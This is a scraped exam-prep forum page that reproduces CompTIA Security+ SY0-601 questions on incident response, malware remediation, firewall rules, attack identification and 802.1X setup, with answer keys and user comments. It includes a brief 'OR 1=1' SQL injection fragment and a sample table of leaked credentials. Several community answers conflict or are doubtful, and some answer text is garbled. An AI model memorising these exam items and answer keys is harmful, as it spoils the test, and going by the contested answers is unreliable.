
  VendorPTS 4 months ago


Thank you. This was super helpful.
upvoted 3 times

  rodwave Most Recent  2 months, 3 weeks ago


Selected Answer: C
Answer: Command injection and directory traversal attempts

Directory traversal is when an attacker uses the software on a web server to access data in a directory other than the server's root directory. If the
attempt is successful, the threat actor can view restricted files or execute commands on the server.

Command injection is an attack that involves executing commands on a host. Typically, the threat actor injects the commands by exploiting an
application vulnerability, such as insufficient input validation.

The attacker is attempting to traverse the directory of the host and execute the cat command which could be used to print the contents of a file.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: C
When I saw 'Get' instantly I went for cmd injection and traversal attempts.
upvoted 2 times

  Jossie_C 3 months ago


Selected Answer: C
The cat command traverses files in a directory.
upvoted 1 times

  Sandon 1 week, 4 days ago


Negative ghost rider. The cat command displays the contents of a file.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
Agree with C
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 256/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  comeragh 5 months ago


Selected Answer: C
Agree with C for this one
upvoted 3 times

Question #152 Topic 1

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

A. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be
avoided in the future.

B. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.

C. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.

D. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

Correct Answer: A

Community vote distribution


A (100%)

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be
avoided in the future.

The final phase of the incident response is also called the lessons learned or remediation step.
=======================
Phases of the Incident Response Plan:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.
upvoted 2 times

  Jossie_C 3 months ago


Remediation AKA lessons learned
upvoted 1 times

  deeden 4 months, 2 weeks ago


Selected Answer: A
https://playbooks.flexibleir.com/incident-response-phases-best-practices/
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
I agree, the other steps were Identification, containment and recovery, It is A, lessons learned
upvoted 3 times

  Danalyst 4 months, 3 weeks ago


'Lessons Learned'
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 257/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #153 Topic 1

HOTSPOT -
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS -
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 258/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Correct Answer:

  cefibo Highly Voted  1 year, 11 months ago


Botnet->Enable DDoS protection
RAT->Disable remote access services
Worm-> Change default passwords
Keylogger->2FA using push
Backdoor->Code Review
upvoted 112 times

  vi2 1 year, 9 months ago


I agree with this selection with exception of the third. As the example given is a SQL Database, I'd say 'Change default application password;.
upvoted 28 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 259/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  leesuh 1 year, 9 months ago


I agree. Will go with this.
upvoted 6 times

  465ekm 1 year, 9 months ago


Will go with this too
upvoted 4 times

  etwe04 1 year, 8 months ago


Everything is right just change Worm > Change Application password
upvoted 11 times

  peymani 1 year, 10 months ago


proof for Keylogger -->2FA https://www.onelogin.com/learn/mfa-types-of-cyber-attacks
upvoted 3 times

  gottapass1sttry 1 year, 10 months ago


To remediate the worm, do I need to change system and app PWs? Does the PBQ allow for the selection of more than one remediation
option?
upvoted 1 times

  hanoi92 Highly Voted  1 year, 3 months ago


I think result
1. Web server ======> Botnet ===> Enable DDoS protection
2. User => RAT =====> Implement a host-base IPS
3. Database server ======> Worm ===> Change the default application password
4. Executive =====> Keylogger > Implement 2FA using push notification
5. Application =======> Backdoor > Conduct a code review
upvoted 14 times

  StillLearning Most Recent  5 days, 21 hours ago


Hi All, on Friday I did the exam and passed thankfully. The first PBQ was how to generate an open SSH key in Linux. It also included the chmod
commands for 777 and chmod 666 I think I know it the first number was a 6.
PBQ 153 and 154 were the 2nd and 3rd questions. One thing I will say know your stuff use this site as a reference as Comptia is changing the
questions. I would also recommend Professor Messer who does a great job of explaining everything: https://www.professormesser.com/security-
plus/sy0-601/sy0-601-video/sy0-601-comptia-security-plus-course/ you can also find this on YouTube. Best of luck to everyone and thanks for
your help and feedback this is always a great source.
upvoted 6 times

  nul8212 1 month, 2 weeks ago


3.- Worm, Chage the default application password
upvoted 1 times

  VendorPTS 4 months ago


Syn packets from multiple sources => WebServer => Botnet => Enable DDoS protection
Establishes a connection, allows remote commands => User => RAT => Implement host-based IPS (Trojans and RATs - CompTIA Security+ SY0-
501 - 1.1 - Professor Messer IT Certification Training Courses)
Self-Propagating => Database Server => Worm => Change Default App Passwords
Hardware to remote monitor user input/credentials => Executive => KeyLogger => 2FA
Embeds hidden access, internally developed app => Application => Backdoor => Conduct Code Review
upvoted 1 times

  andrizo 3 months, 3 weeks ago


not liking ips vs disabling
upvoted 1 times

  VendorPTS 4 months ago


The hyperlink to RATs got lost in the post above. This was helpful to me.
https://www.professormesser.com/security-plus/sy0-501/trojans-and-rats/
upvoted 1 times

  tony9622 4 months, 1 week ago


How does 2FA push notifications prevent key logging?
upvoted 1 times

  andrizo 3 months, 3 weeks ago


possibly because even if they have your login, they cannot bypass a secondary authentication method with just a keylogger
upvoted 2 times

  irfana 6 months, 3 weeks ago


Just took SY0-601 Exam today and pass !!
**This question was on the test**
upvoted 8 times

  CLAW_ 7 months, 1 week ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 260/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Passed last week Thursday with 800. This was the third question on the test. I went with -
Botnet->Enable DDoS protection
RAT->Disable remote access services
Worm-> Change default passwords
Keylogger->2FA using push
Backdoor->Code Review
upvoted 9 times

  Reactsean 7 months, 2 weeks ago


Definitely on the test
upvoted 2 times

  Incredible99 8 months ago


It was on 05/24/2022 exam
upvoted 1 times

  eddie_network_jedi 9 months ago


Appear on exam (May, the 3rd - 2022). Exam passed :)
upvoted 1 times

  hypertweeky 8 months, 4 weeks ago


Did you go with Cefibo’s answer? Congrats!
upvoted 1 times

  NaiveMind 9 months, 2 weeks ago


Just took the SY0-601 Exam today and PASS !!
This question was on the test. I chose the same as cefibo.
Thanks cefibo !!
upvoted 4 times

  Shady9731 10 months, 1 week ago


what is the difference between fuzzing and code review?
upvoted 1 times

  andrizo 3 months, 3 weeks ago


fuzzing is just input validation
upvoted 1 times

  greendoor 7 months, 4 weeks ago


in a nutshell: code review is static. fuzzing is dynamic code review.
upvoted 2 times

  Mickers 7 months, 1 week ago


So wouldnt fuzzing be the best overall solutions? To avoid internal mistakes/misses?
upvoted 2 times

  Faithful_Revenant 11 months ago


I got this question.
upvoted 2 times

  syaldram 1 year, 1 month ago


I just passed the sec + and this was on the exam!
upvoted 7 times

  amuk21 1 year, 2 months ago


Botnet - Enable DDoS protection
RAT - Disable remote access
Worm - Change default application password
Keylogger - 2FA using Push
Backdoor - Code Review
upvoted 3 times

  Berlus 1 year, 2 months ago


BOTNET - Enable DDoS Protection
RAT - Disable Remote Access Services
WORM - Change Default Application Password
KEYLOGGER - 2FA
BACKDOOR - Conduct Code Review
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 261/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #154 Topic 1

SIMULATION -
A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

INSTRUCTIONS -
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 262/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 263/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 264/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Correct Answer: See explanation below.


Firewall 1:
DNS Rule 10.0.0.1/24 "€‫ ג‬--> ANY --> DNS --> PERMIT
HTTPS Outbound 10.0.0.1/24 "€‫ ג‬--> ANY --> HTTPS --> PERMIT
Management ‫ג‬€" ANY --> 10.0.0.1/24 --> SSH --> PERMIT
HTTPS Inbound ‫ג‬€" ANY --> 10.0.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound ‫ג‬€" ANY --> 10.0.0.1/24 --> HTTP --> DENY
Firewall 2:
DNS Rule 10.0.1.1/24 "€‫ ג‬--> ANY --> DNS --> PERMIT
HTTPS Outbound 10.0.1.1/24 "€‫ ג‬--> ANY --> HTTPS --> PERMIT
Management ‫ג‬€" ANY --> 10.0.1.1/24 --> SSH --> PERMIT
HTTPS Inbound ‫ג‬€" ANY --> 10.0.1.1/24 --> HTTPS --> PERMIT
HTTP Inbound ‫ג‬€" ANY --> 10.0.1.1/24 --> HTTP --> DENY
Firewall 3:
DNS Rule 192.168.0.1/24 >-- 10.0.0.1/24 "€‫ ג‬--> DNS --> PERMIT
HTTPS Outbound 192.168.0.1/24 "€‫ ג‬--> ANY --> HTTPS --> PERMIT
Management ‫ג‬€" ANY --> 192.168.0.1/24 --> SSH --> PERMIT
HTTPS Inbound ‫ג‬€" ANY --> 192.168.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound ‫ג‬€" ANY --> 192.168.0.1/24 --> HTTP --> DENY

  axvfrance Highly Voted  1 year, 5 months ago


Hi everyone! After reading those comments, in my opinion this is the correct answer:
Firewall 1:

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 265/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

10.0.0.1/24 - ANY - DNS - PERMIT


10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 54 times

  HypeMan_crew 2 months, 2 weeks ago


I think this is correct. If there was "10.0.0.254/24" in both the source and destination drop-downs, then there would have been some slight
changes made in firewall 2 configurations.
This has to be the correct answer!
upvoted 1 times

  oooMooo 1 year, 4 months ago


There should be no changes to Firewall 2 as the issue you're trying to fix is associated with web browsing. Firewall 2 manages the email
server.
upvoted 3 times

  LeadBasedPaint 1 year, 3 months ago


We don't know what the "default" settings of Firewall #2 are. The question specifically states that we are to "ensure secure management
protocols are used. So, *at least* check Firewall #2 to make sure SSH management is enabled.
upvoted 8 times

  1Kbit 10 months, 2 weeks ago


by default for Firewall2 Management, I had telnet so I changed it to ssh
upvoted 7 times

  Xemnas Highly Voted  1 year, 12 months ago


why not?
DNS Rule "" ANY --> ANY --> DNS --> PERMIT
HTTPS Outbound "" 10.0.0.1/24 --> ANY --> HTTPS --> PERMIT
Management "" ANY --> ANY --> SSH --> PERMIT
HTTPS Inbound "" ANY --> 10.0.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound "" ANY --> ANY --> HTTP --> DENY
Firewall 2: No changes should be made to this firewall
Firewall 3:
DNS Rule "" ANY --> ANY --> DNS --> PERMIT
HTTPS Outbound "" 192.168.0.1/24 --> ANY --> HTTPS --> PERMIT
Management "" ANY --> ANY --> SSH --> PERMIT
HTTPS Inbound "" ANY --> 192.168.0.1/24 --> HTTPS --> PERMIT
HTTP Inbound "" ANY --> ANY --> HTTP --> DENY
upvoted 28 times

  deeden 4 months, 2 weeks ago


Understanding a little bit about networking, I believe this config will achieve the same objective as the model answer. Although, for Firewall 2,
the email server will need DNS and SSH to be permitted, I'm not sure if it needs HTTP/HTTPS permit, unless it's providing webmail services.
In any case, Emails will be down if main Datacenter router dies.
upvoted 2 times

  [Removed] 1 year, 8 months ago


I believe this is wrong. Why would Firewall 1 source be configured to "Any" when the only device connected to the firewall is the Web Server?
upvoted 6 times

  charlier 1 year ago


Because a /24 means you're permitting traffic to everything on that VLAN/subnet, basically equivocal to "Any"... The answer your thinking
of, correctly and professionally would be configured as a /32 (255.255.255.255). This question also omits interfaces, scopes and other
things - so I guess try not to overthink it.
upvoted 5 times

  xMilkyMan123 1 year, 11 months ago


The keyword is "Outbound" this means its source will be inside the network and destination will be ANY.

I was also a bit confused at first with this one


upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 266/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  peymani 1 year, 10 months ago


he/she said https inbound
upvoted 2 times

  ash 1 year, 9 months ago


is this correct? im confused
upvoted 1 times

  sanlibo Most Recent  1 week, 1 day ago


passed the exam last Wednesday

Take note:
-I did not configure the WHOLE firewall 1, 2 and 3 as it is already pre configured. You will just need to fix the wrong config.
-HTTP inbound are Permitted. Change it to Deny.
-I did not do any changes on Firewall 2.
-On FW3, change the DNS Rule to correct "Source" IP.

this is what the answer looks like after changing some of the config.

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 1 times

  Sandon 1 week ago


Thank you sir
upvoted 1 times

  KingTre 1 month, 2 weeks ago


Took the test on saturday. I passed! All of the PBQs were on the test BUT Only about 3 MC questions came from this study guide. know your
material if you want to pass. Memorizing this will not help.
upvoted 1 times

  JustInTime23 1 month, 3 weeks ago


if you had "ANY" for management as the source, couldn't anyone potentially SSH into your network? Wouldn't you just want management from
within specific networks?
upvoted 1 times

  ostralo 3 months, 3 weeks ago


One thing about the DNS rule,
ref) https://upcloud.com/resources/tutorials/dns-servers
as you can see in the ref, the servers must be able to receive DNS responses. If you allow only outbound DNS traffic, the servers cannot receive
DNS responses, which means when you update the servers, you cannot connect to online sources.

So, I would go for this.

FW1
DNS rule ANY - ANY - DNS - PERMIT
Https out 10.0.0.1/24 - ANY - HTTPS - PERMIT
Management ANY - 10.0.0.1/24 - SSH - PERMIT
https in ANY - 10.0.0.1/24 - HTTPS - PERMIT
Http in ANY - 10.0.0.1/24 - HTTP - DENY

FW2
DNS rule ANY - ANY - DNS - PERMIT
Https out 10.0.1.1/24 - ANY - HTTPS - PERMIT
Management ANY - 10.0.1.1/24 - SSH - PERMIT
https in ANY - 10.0.1.1/24 - HTTPS - PERMIT
Http in ANY - 10.0.1.1/24 - HTTP - DENY

FW3
DNS rule ANY - ANY - DNS - PERMIT

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 267/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Https out 192.168.0.1/24 - ANY - HTTPS - PERMIT


Management ANY - 192.168.0.1/24 - SSH - PERMIT
https in ANY - 192.168.0.1/24 - HTTPS - PERMIT
Http in ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 2 times

  ostralo 3 months, 3 weeks ago


correction on the last config
Http in ANY - ANY - HTTP - DENY
this would be easier to add another server to the segment. No worry about HTTP at all.
upvoted 1 times

  vimone 5 months, 3 weeks ago


Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - DNS - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY

Note: Firewall 2 is email server so the management is DNS permit not SSH
upvoted 5 times

  db97 4 months, 1 week ago


DNS for management? I don't think so
upvoted 1 times

  Jatinder025 5 months, 3 weeks ago


Has anyone taken the exam recently in Aug 2022, know the correct answer, seems like everyone is using their own combination of the answers.
upvoted 4 times

  MarkMcE1 5 months, 3 weeks ago


What section is this under? Whats the best video to understand this?
upvoted 1 times

  webmaster147 6 months, 1 week ago


Correct Answer
upvoted 1 times

  Edyspbrazil 6 months, 1 week ago


Hi Mates with you want know about rules https://community.checkpoint.com/t5/Management/Layers-and-the-cleanup-rule/td-p/6553

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
upvoted 1 times

  Svol 7 months, 1 week ago


Finished my exam 5 minutes ago and only the first two simulations were on my exam the remaining 73 questions and simulations were different.
HOWEVER... I still passed because you need to read all of the comments by people here. That's the only damn reason I passed.
upvoted 8 times

  Skydragon207 6 months, 1 week ago


hi, do you have a discord that I can dm you questions?
upvoted 2 times

  Svol 7 months, 1 week ago


Finished my exam 5 minutes ago and only the first two simulations were on my exam AND NOTHING ELSE... NO OTHER QUESTION WAS ON
MY EXAM. The remaining 73 questions and simulations had nothing even remotely similar to any of the 357 remaining questions on this site.
upvoted 3 times

  CLAW_ 7 months, 1 week ago


Took my test last week Thursday and passed with 800. This question was 100% on there, in fact it was the first question. I went with the below
and MAKE SURE YOU CHECK FIRWALL 2!!! Change it from Telnet to SSH.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 268/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY
upvoted 12 times

  CyborgTick 6 months, 2 weeks ago


I agree with you 100%, but at the DNS rule.. remember that
DNS lookups are OUTBOUND
DNS Queries are INBOUND
So I think DNS SHOULD be Any Any
upvoted 2 times

  Reactsean 7 months, 2 weeks ago


10000% on the test.
upvoted 2 times

  Serengeti 5 months, 2 weeks ago


Do we have 10000% in percentage?
upvoted 1 times

  Incredible99 8 months ago


On 05/24 exam.
upvoted 1 times

  eddie_network_jedi 9 months ago


appear on exam (May, the 3rd - 2022). Exam passed :)
upvoted 4 times

  hypertweeky 8 months, 4 weeks ago


Which combination did you use? Congrats!!’
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 269/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #155 Topic 1

SIMULATION -
An attack has occurred against a company.

INSTRUCTIONS -
You have been tasked to do the following:
✑ Identify the type of attack that is occurring on the network by clicking on the attacker's tablet and reviewing the output.
✑ Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by
dragging them to the correct server.
All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 270/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 271/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Correct Answer: See explanation below.

  stoneface Highly Voted  5 months ago


I think this is correct.
Application Source Code -> Code Review

CRM Server - > Record Level access Control

Web Server -> WAF and URL Filtering - I initially went with Input Validation instead of URL filtering, but URL filtering works by comparing all web
traffic against URL filters, which are typically contained in a database of sites that users are permitted to access or denied from accessing.

Database ->Input validation


upvoted 20 times

  deeden 4 months, 2 weeks ago


Agreed. The answer is correct. The response page doesn't seem to be consistent with any of the possible output using the other attacks.
Found this link from way back SY0-401 blog.
https://blogs.getcertifiedgetahead.com/cookie-attacks-security/
upvoted 2 times

  stoneface 5 months ago


For the attack I think this is a SQLi attack
upvoted 4 times

  Knowledge33 3 months ago


It's not mentioned in the question that the database is using SQL. It could be Oracle or anything else. It means SQLi is not correct. The
unique possibility is XSS attack
upvoted 1 times

  Lionel_TheITGuy 2 weeks, 4 days ago


Oracle dbs use a sql structure though.
upvoted 3 times

  KetReeb 5 months ago


Why not Session Hijacking? The output shows that the table used multiple accounts and the session cookies associated with the account
IDs.
upvoted 1 times

  stoneface 5 months ago


Very true - > After digging aroung (again) this could be a Session Hijacking attack, and also a XSS attack - https://owasp.org/www-
community/attacks/Session_hijacking_attack

But a session hijacking attack or a XSS would not reveal session ids for multiple users, besides there are additional fields on the
response (name, login_time), this is information that will tipically be stored on a database.

I still believe this is a SQLi attack ... I listen to you.


upvoted 6 times

  anonimouse2 5 months ago


It is a XSS attack. Check diagram here: https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 272/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 5 times

  andrizo 3 months, 3 weeks ago


xss steals cookies that contain session data, thank you very much!
upvoted 1 times

  inkedia3 Highly Voted  4 months, 1 week ago


Wrote the exams yesterday and passed. Please pay attention to these PBQs. they were all on the exams. Funny I wasnt paying must attention to
them till about three hours before my exams. Anyway I passed with 785 score... I will say give these questions 90% of your attention and look for
the 10% from other sources...
upvoted 15 times

  nobnarb Most Recent  2 months, 2 weeks ago


The Answer is cross-site scripting, this is from Darryl Gibson's website.
Q. A penetration tester has successfully exploited a vulnerability against your organization giving him access to the following data:

User, password, login-date, cookie-id


Homer, canipass, 2016-09-01 11:12, 286755fad04869ca523320acce0dc6a4
Bart, passican, 2016-09-01 11:15, 8edd7261c353c87a113269cd37635c68
Marge, icanpass, 2016-09-01 11:19, 26887fbd90ac0340e29ad62470270401

What type of attack does this represent?

A. SQL injection

B. XML injection

C. XSS

D. Session hijacking

Answer: C. Cross-site scripting (XSS) is the best choice of the available answers. You can see that the penetration tester is looking at cookies
because the header includes ‘cookie-id’ and successful cross-site scripting (XSS) attacks allow attackers to capture user information such as
cookies.
upvoted 7 times

  J_Ark1 2 months, 4 weeks ago


Definately Cross site Scripting because the end user is being attacked, The main difference between a SQL and XSS injection attack is that SQL
injection attacks are used to steal information from databases whereas XSS attacks are used to redirect users to websites where attackers can
steal data from them. SQL injection is data-base focused whereas XSS is geared towards attacking end users. so definately XSS since end user
is affected.
upvoted 2 times

  J_Ark1 2 months, 4 weeks ago


notice the http header
upvoted 1 times

  apata123 3 months ago


This appeared in my exam today, I choose Session hijacking to be the attack… I passed my exam
upvoted 2 times

  banditring 4 months, 2 weeks ago


what is a CRM server?
upvoted 2 times

  Jakalan7 4 months, 2 weeks ago


Google is your friend. CRM stands for customer relationship management, it's where companies store information about their customers, so
it's a database.
upvoted 2 times

  redsidemanc2 4 months, 4 weeks ago


I think its SQLI just because its saying input validation. you put input validation on database to prevent 1=1 ETC
upvoted 3 times

  enginne 4 months, 4 weeks ago


In this scenario we recommend input validation for DB as compensating control - SQL Injection
upvoted 1 times

  mark9999 5 months ago


Application Source Code -> Code Review
CRM Server - > Record Level access Control
Web Server -> WAF and URL Filtering
Database ->Input validation
All the same as stoneface put. I think he might be correct with SQL injection as well as the output shows all the users data which is exactly what
you get when using OR 1=1, or apostrophe's in the WHERE clause to cause it to evaluate to TRUE. The session IDs are just part of the column
output, bit of a red herring.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 273/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Ribeiro19 5 months ago


SQLi attack
web server - WAF URL Filtering
Database - Record Leval Access control
app repository (with code) - Code Revies Input Validation
CRM server - NAN
upvoted 4 times

  Ribeiro19 5 months ago


This is a SQLi attack, because with one request the hacker get the multiple accounts and the session cookies associated with the account IDs.
And is not a Session Hijacking attack, because this the next step of the attack. First ex-filtrate the info with the SQLi attack, and them create
payloads to do a Session Hijacking attack.

My question what is a CRM Server? or what this server make in one application?
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 274/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #156 Topic 1

SIMULATION -
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X
using the most secure encryption and protocol available.

INSTRUCTIONS -
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01 -

Password: guestpass -
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 275/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 276/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Correct Answer: See explanation below.


Configure the settings as shown below:

  DUCKDOG Highly Voted  5 months ago


Wifi Controller
SSID: CORPGUEST
SHARED KEY: Secret
AAA server IP: 192.168.1.20
PSK: Blank
Authentication type: WPA2-EAP-PEAP-MSCHAPv2
Controller IP: 192.168.1.10

Radius Server
Shared Key: Secret
Client IP: 192.168.1.10
Authentication Type: Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID: CORPGUEST
Username: guest01
Userpassword: guestpass
PSK: Blank
Authentication type: WPA2-Enterprise
upvoted 28 times

  Juraj22 2 months ago


Absolutly right from network admin. And this is answr for everybody. if you are using Wifi and Radius, you cant use WPA2-PSK...WPA2-PSK is
for password sharing, for authentication via radius and ActiveDirectory, you have to use EAP-PEAP-MSCHAPv2 :) And i am 100% sure. So
this solution is really OK. And last thing, end user(client), has to know only username and password for client, nothing more....In other
words(there is authentication server- radius and authenticator(Wireless controller), they have to know secret key, but client only username and
pass)
upvoted 5 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 277/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  andrizo 3 months, 3 weeks ago


would you mind explaining the auth type=eap-peap; wpa2 enterprise? i think i know why a pre shared key would not be used here.
upvoted 1 times

  Juraj22 2 months ago


yes, in this scenario, You have a 3 type of devices called Authentication server(radius or tacacs), authenticator(AP controller, or switches or
AP in standalone mode and so on) and last one is client. And everything is about that, if client want to join to network, he must contact
authenticator(switch- via ethernet cable or AP - wireless) and in this contact is username and password. Authenticator(swich or in this
scenario AP controller) takes this credentials and sends it to Radius, radus then check this user an his password and if everything is ok,
then he send accept message to authenticator and authenticator to client and client can have full access to network. If not, he will be
rejected. This is only in general, there is more steps, bud idea is that everything is going via EAP :) not WPA2-PSK
upvoted 4 times

  ostralo Highly Voted  3 months, 3 weeks ago


Wifi Controller
SSID - CORPGUEST
Shared key - SECRET (from Radius server)
AAA server IP - 192.168.1.20
PSK - N/A?
Authentication type - WPA2-EAP-PEAP-MSCHAPv2

Radius Server
Shared Key - SECRET
Client IP - 192.168.1.10(Controller IP)
Authentication type - Active Directory(the guest account was created in AD)
Server IP - 192.168.1.20

Wireless Client
SSID - CORPGUEST
Username - guest01
